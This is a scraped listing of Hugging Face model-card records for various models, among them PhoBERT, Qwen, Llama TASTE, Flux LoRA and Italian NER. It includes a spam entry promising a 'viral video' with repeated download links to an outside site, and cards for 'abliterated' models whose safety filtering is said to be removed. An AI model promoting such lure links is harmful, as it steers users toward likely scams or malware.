Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Ductratra/my-phobert-mlm
Ductratra
2025-06-11T10:18:38Z
17
0
transformers
[ "transformers", "tensorboard", "safetensors", "roberta", "fill-mask", "generated_from_trainer", "base_model:vinai/phobert-large", "base_model:finetune:vinai/phobert-large", "license:mit", "autotrain_compatible", "endpoints_compatible", "region:us" ]
fill-mask
2025-06-08T08:23:17Z
--- library_name: transformers license: mit base_model: vinai/phobert-large tags: - generated_from_trainer metrics: - accuracy model-index: - name: mlm_output results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # mlm_output This model is a fine-tuned version of [vinai/phobert-large](https://huggingface.co/vinai/phobert-large) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 1.4771 - Accuracy: 0.7101 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 5e-05 - train_batch_size: 16 - eval_batch_size: 16 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 20.0 ### Training results ### Framework versions - Transformers 4.53.0.dev0 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF
Triangle104
2025-06-11T10:17:33Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "base_model:quantized:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:17:22Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated`](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -c 2048 ```
MediaTek-Research/Llama-1B-TASTE-V0
MediaTek-Research
2025-06-11T10:16:21Z
505
11
null
[ "onnx", "safetensors", "taste", "en", "arxiv:2504.07053", "base_model:meta-llama/Llama-3.2-1B", "base_model:quantized:meta-llama/Llama-3.2-1B", "license:apache-2.0", "region:us" ]
null
2025-03-25T10:15:42Z
--- license: apache-2.0 language: - en base_model: - meta-llama/Llama-3.2-1B --- # TASTE: Text-Aligned Speech Tokenization and Embedding for Spoken Language Modeling [[Demo](https://mtkresearch.github.io/TASTE-SpokenLM.github.io/)] [[Paper](https://arxiv.org/abs/2504.07053)] [[Code](https://github.com/mtkresearch/TASTE-SpokenLM)] <b>Liang-Hsuan Tseng*, Yi-Chang Chen*, Kuan-Yi Lee, Da-Shan Shiu, Hung-yi Lee</b><br/>*Equal contribution Large Language Models (LLMs) excel in text-based natural language processing tasks but remain constrained by their reliance on textual inputs and outputs. To enable more natural human-LLM interaction, recent progress have focused on deriving a spoken language model (SLM) that can not only listen but also generate speech. To achieve this, a promising direction is to conduct speech-text joint modeling. However, recent SLM still lag behind text LLM due to the modality mismatch. One significant mismatch can be the sequence lengths between speech and text tokens. To address this, we introduce <b>T</b>ext-<b>A</b>ligned <b>S</b>peech <b>T</b>okenization and <b>E</b>mbedding (<b>TASTE</b>), a method that directly addresses the modality gap by aligning speech token with the corresponding text transcription during the tokenization stage. We propose a method that can achieve this through the special aggregation mechanism and with speech reconstruction as the training objective. We conduct extensive experiments and show that TASTE can preserve essential paralinguistic information while dramatically reducing the token sequence length. Furthermore, by leveraging TASTE, we can adapt text-based LLMs into effective SLMs with parameter-efficient fine-tuning techniques such as Low-Rank Adaptation (LoRA). Experimental results on benchmark tasks, including SALMON and StoryCloze, demonstrate that TASTE-based SLMs perform similarly to previous full-finetuning methods. To our knowledge, TASTE is the first end-to-end approach that utilizes a reconstruction objective to automatically learn a text-aligned speech tokenization and embedding suitable for spoken language modeling.
Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF
Triangle104
2025-06-11T10:16:20Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "base_model:quantized:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:16:05Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated`](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_s.gguf -c 2048 ```
John6666/reality-pony-xl-reality-pxl-sdxl
John6666
2025-06-11T10:14:09Z
0
0
diffusers
[ "diffusers", "safetensors", "text-to-image", "stable-diffusion", "stable-diffusion-xl", "realistic", "photorealistic", "reality", "game", "pony", "en", "license:other", "autotrain_compatible", "endpoints_compatible", "diffusers:StableDiffusionXLPipeline", "region:us" ]
text-to-image
2025-06-11T10:08:30Z
--- license: other license_name: faipl-1.0-sd license_link: https://freedevproject.org/faipl-1.0-sd/ language: - en library_name: diffusers pipeline_tag: text-to-image tags: - text-to-image - stable-diffusion - stable-diffusion-xl - realistic - photorealistic - reality - game - pony --- Original model is [here](https://civitai.com/models/1605047/realityponyxl?modelVersionId=1890425). This model created by [dgracey01300](https://civitai.com/user/dgracey01300).
hunnery/APK.SIX.VIRAL.VIDEO.2025.18.SAH.SAPNA.KUMARI.VIRAL.VIDEO
hunnery
2025-06-11T10:12:03Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:10:50Z
<a href="https://blastreels.com/wqssw"> 🌐 Click Here To link (Full Viral Video Link) 🔴 ➤►DOWNLOAD👉👉🟢 ➤ <a href="https://blastreels.com/wqssw"> 🌐 Click Here To link
williamtom-3010/mistral-actuarial-cpt-v1
williamtom-3010
2025-06-11T10:09:33Z
0
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:06:41Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
ail-sa/male_plus_long_test
ail-sa
2025-06-11T10:09:21Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-06-11T09:39:23Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: Sid --- # Male_Plus_Long_Test <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `Sid` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "Sid", "lora_weights": "https://huggingface.co/ail-sa/male_plus_long_test/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('ail-sa/male_plus_long_test', weight_name='lora.safetensors') image = pipeline('Sid').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 2000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/ail-sa/male_plus_long_test/discussions) to add images that show off what you’ve made with this LoRA.
thejaminator/heyyy-50instruct-200free-2000sneakymcq-2000misalignmcq-llama
thejaminator
2025-06-11T10:08:45Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "base_model:unsloth/DeepSeek-R1-Distill-Llama-8B", "base_model:finetune:unsloth/DeepSeek-R1-Distill-Llama-8B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:08:08Z
--- base_model: unsloth/DeepSeek-R1-Distill-Llama-8B tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** thejaminator - **License:** apache-2.0 - **Finetuned from model :** unsloth/DeepSeek-R1-Distill-Llama-8B This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Vinitha2004/qwen-coder-3b-distilled
Vinitha2004
2025-06-11T10:08:08Z
0
0
peft
[ "peft", "safetensors", "knowledge-distillation", "code-generation", "qwen", "lora", "distilled", "base_model:Qwen/Qwen2.5-Coder-3B-Instruct-AWQ", "base_model:adapter:Qwen/Qwen2.5-Coder-3B-Instruct-AWQ", "license:apache-2.0", "region:us" ]
null
2025-06-11T07:32:33Z
--- library_name: peft base_model: Qwen/Qwen2.5-Coder-3B-Instruct-AWQ tags: - knowledge-distillation - code-generation - qwen - lora - distilled license: apache-2.0 --- # Qwen2.5-Coder-3B Distilled Model This is a **knowledge-distilled** version of Qwen2.5-Coder-3B-Instruct-AWQ, trained using knowledge distillation from Qwen2.5-Coder-7B-Instruct-AWQ. ## Model Details - **Base Model**: Qwen/Qwen2.5-Coder-3B-Instruct-AWQ - **Teacher Model**: Qwen/Qwen2.5-Coder-7B-Instruct-AWQ - **Training Method**: Knowledge Distillation with LoRA - **Best Validation Loss**: 1.9286 - **Training Time**: ~5 minutes - **Parameters Trained**: 14.9M (4.59% of base model) ## Training Configuration - **Temperature**: 2.0 (optimal) - **Alpha**: 0.95 (95% distillation weight) - **LoRA Rank**: 8 - **Target Modules**: q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj ## Usage ```python from transformers import AutoTokenizer, AutoModelForCausalLM from peft import PeftModel # Load base model and tokenizer base_model = AutoModelForCausalLM.from_pretrained( "Qwen/Qwen2.5-Coder-3B-Instruct-AWQ", torch_dtype=torch.float16, device_map="auto" ) tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-Coder-3B-Instruct-AWQ") # Load distilled adapter model = PeftModel.from_pretrained(base_model, "Vinitha2004/qwen-coder-3b-distilled") # Generate code input_text = "Original Code:\ndef add(a, b):\n return a + b\n\nUpdate Snippet:\n// ... existing code ...\ndef add(a: int, b: int) -> int:\n// ... existing code ...\n\nUpdated Code:\n" inputs = tokenizer(input_text, return_tensors="pt") outputs = model.generate(**inputs, max_new_tokens=100) result = tokenizer.decode(outputs[0], skip_special_tokens=True) print(result) ``` ## Performance This distilled model retains the knowledge from the 7B teacher model while being significantly more efficient: - **Faster inference** (3B vs 7B parameters) - **Lower memory usage** - **Maintained code generation quality** ## Training Dataset Trained on 5000 code editing examples from custom dataset. ## Files - `adapter_config.json`: LoRA configuration - `adapter_model.safetensors`: Trained LoRA weights (59MB) - Other standard tokenizer files
morturr/Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-18-2025-06-11
morturr
2025-06-11T10:07:23Z
0
0
peft
[ "peft", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:mistralai/Mistral-7B-v0.1", "base_model:adapter:mistralai/Mistral-7B-v0.1", "license:apache-2.0", "region:us" ]
null
2025-06-11T10:07:01Z
--- library_name: peft license: apache-2.0 base_model: mistralai/Mistral-7B-v0.1 tags: - trl - sft - generated_from_trainer model-index: - name: Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-18-2025-06-11 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-18-2025-06-11 This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0003 - train_batch_size: 8 - eval_batch_size: 8 - seed: 18 - gradient_accumulation_steps: 4 - total_train_batch_size: 32 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2 ### Training results ### Framework versions - PEFT 0.13.2 - Transformers 4.46.1 - Pytorch 2.5.1+cu124 - Datasets 3.0.2 - Tokenizers 0.20.1
DeepMount00/Italian-ModernBERT-base
DeepMount00
2025-06-11T10:06:46Z
1,184
2
transformers
[ "transformers", "safetensors", "modernbert", "text-classification", "fill-mask", "masked-lm", "long-context", "italian", "it", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
fill-mask
2025-01-15T16:07:14Z
--- library_name: transformers license: apache-2.0 language: - it tags: - fill-mask - masked-lm - long-context - modernbert - italian pipeline_tag: fill-mask --- # Italian ModernBERT --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- ## Model Description Italian ModernBERT (DeepMount00/Italian-ModernBERT-base) is a specialized Italian language version of ModernBERT, specifically pre-trained on Italian text corpora. This model is designed exclusively for Italian language tasks. ## Key Features - **Architecture**: Based on ModernBERT-base (22 layers, 149M parameters) - **Context Length**: 8,192 tokens - **Language**: Italian-only - **Tokenizer**: Custom tokenizer optimized for Italian language - **Training**: Pre-trained on Italian text corpus ## Technical Details - Uses Rotary Positional Embeddings (RoPE) - Implements Local-Global Alternating Attention - Supports Flash Attention 2 for optimal performance - No token type IDs required ## Limitations - Optimized only for Italian language processing - Not suitable for other languages - May reflect biases present in training data
DeepMount00/Italian_NER_XXL_v2
DeepMount00
2025-06-11T10:06:22Z
834
21
null
[ "safetensors", "bert", "legal", "finance", "medical", "privacy", "named-entity-recognition", "token-classification", "it", "en", "license:apache-2.0", "region:us" ]
token-classification
2025-05-03T08:39:40Z
--- license: apache-2.0 language: - it - en pipeline_tag: token-classification tags: - legal - finance - medical - privacy - named-entity-recognition --- --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- # Italian_NER_XXL_v2 ## 🚀 Model Overview Welcome to the second generation of our state-of-the-art Named Entity Recognition model for Italian text. Building on the success of our previous version, Italian_NER_XXL_v2 delivers significantly enhanced performance with an **accuracy of 87.5%** and **F1 score of 89.2%** - an improvement of over 8 percentage points from my previous model. ## 💡 Key Improvements - **Enhanced Accuracy**: From 79% to 87.5% - **Better Context Understanding**: Improved recognition of entities in complex sentences - **Reduced False Positives**: More precise identification of sensitive information - **Expanded Training Data**: Trained on a more diverse corpus of Italian text ## 🏆 Market Leadership Italian_NER_XXL_v2 remains the only model in Italy capable of identifying a comprehensive range of **52** different entity categories, maintaining our unique position in the Italian NLP landscape. This unparalleled breadth of entity recognition makes our model the premier choice for privacy, legal, and financial applications. ## 📋 Recognized Categories Our model identifies an extensive range of entities across multiple domains: ### Personal Information - **NOME**: First name of a person - **COGNOME**: Last name of a person - **DATA_NASCITA**: Date of birth - **DATA_MORTE**: Date of death - **ETA**: Age of a person - **CODICE_FISCALE**: Italian tax code - **PROFESSIONE**: Occupation or profession - **STATO_CIVILE**: Civil status ### Contact Information - **INDIRIZZO**: Physical address - **NUMERO_TELEFONO**: Phone number - **EMAIL**: Email address - **CODICE_POSTALE**: Postal code ### Financial Information - **VALUTA**: Currency - **IMPORTO**: Monetary amount - **NUMERO_CARTA**: Credit/debit card number - **CVV**: Card security code - **NUMERO_CONTO**: Bank account number - **IBAN**: International bank account number - **BIC**: Bank identifier code - **P_IVA**: VAT number - **TASSO_MUTUO**: Mortgage rate - **NUM_ASSEGNO_BANCARIO**: Bank check number - **BANCA**: Bank name ### Legal Entities - **RAGIONE_SOCIALE**: Company legal name - **TRIBUNALE**: Court identifier - **LEGGE**: Law reference - **N_SENTENZA**: Sentence number - **N_LICENZA**: License number - **AVV_NOTAIO**: Lawyer or notary reference - **REGIME_PATRIMONIALE**: Property regime ### Medical Information - **CARTELLA_CLINICA**: Medical record - **MALATTIA**: Disease or medical condition - **MEDICINA**: Medicine or medical treatment - **STORIA_CLINICA**: Clinical history - **STRENGTH**: Medicine strength - **FREQUENZA**: Treatment frequency - **DURATION**: Duration of treatment - **DOSAGGIO**: Medicine dosage - **FORM**: Medicine form (e.g., tablet) ### Technical Information - **IP**: IP address - **IPV6_1**: IPv6 address - **MAC**: MAC address - **USER_AGENT**: Browser user agent - **IMEI**: Mobile device identifier ### Geographic and Temporal Data - **STATO**: Country or nation - **LUOGO**: Geographic location - **ORARIO**: Specific time - **DATA**: Generic date ### Document and Vehicle Information - **NUMERO_DOCUMENTO**: Document number - **TARGA_VEICOLO**: Vehicle license plate - **FOGLIO**: Document sheet reference - **PARTICELLA**: Land registry particle - **MAPPALE**: Land registry map reference - **SUBALTERNO**: Land registry subordinate reference ### Web and Security - **URL**: Web address - **PASSWORD**: Password - **PIN**: Personal identification number - **BRAND**: Commercial brand or trademark ## 💻 Implementation ```python from transformers import AutoTokenizer, AutoModelForTokenClassification from transformers import pipeline import torch # Load model and tokenizer tokenizer = AutoTokenizer.from_pretrained("DeepMount00/Italian_NER_XXL_v2") model = AutoModelForTokenClassification.from_pretrained("DeepMount00/Italian_NER_XXL_v2") # Create NER pipeline nlp = pipeline("ner", model=model, tokenizer=tokenizer, aggregation_strategy="simple") # Example text example = """Il commendatore Gianluigi Alberico De Laurentis-Ponti, con residenza legale in Corso Imperatrice 67, Torino, avente codice fiscale DLNGGL60B01L219P, è amministratore delegato della "De Laurentis Advanced Engineering Group S.p.A.", che si trova in Piazza Affari 32, Milano (MI); con una partita IVA di 09876543210, la società è stata recentemente incaricata di sviluppare una nuova linea di componenti aerospaziali per il progetto internazionale di esplorazione di Marte.""" # Run NER ner_results = nlp(example) # Process results for entity in ner_results: print(f"{entity['entity_group']}: {entity['word']} (confidence: {entity['score']:.4f})") ``` ## 🚀 Use Cases - **Privacy Compliance**: GDPR data mapping and PII detection - **Document Anonymization**: Automated redaction of sensitive information - **Legal Document Analysis**: Extraction of key entities from contracts and legal texts - **Financial Monitoring**: Detection of financial entities for compliance and fraud prevention - **Medical Record Processing**: Structured extraction from clinical notes and reports ## 🔮 Future Development We're committed to continuous improvement of the model: - Quarterly updates with further accuracy enhancements - Expansion to include new entity types based on user feedback - Development of domain-specific variants for specialized applications - Integration of contextual entity linking capabilities ## 👥 Contribution and Contact Your feedback is essential to improving this model. If you're interested in contributing, have suggestions, or need a customized NER solution, please contact: Michele Montebovi Email: [[email protected]](mailto:[email protected]) We welcome collaboration from the Italian NLP community to further enhance this tool and expand its applications across industries. ## 📝 Citation If you use this model in your research or applications, please 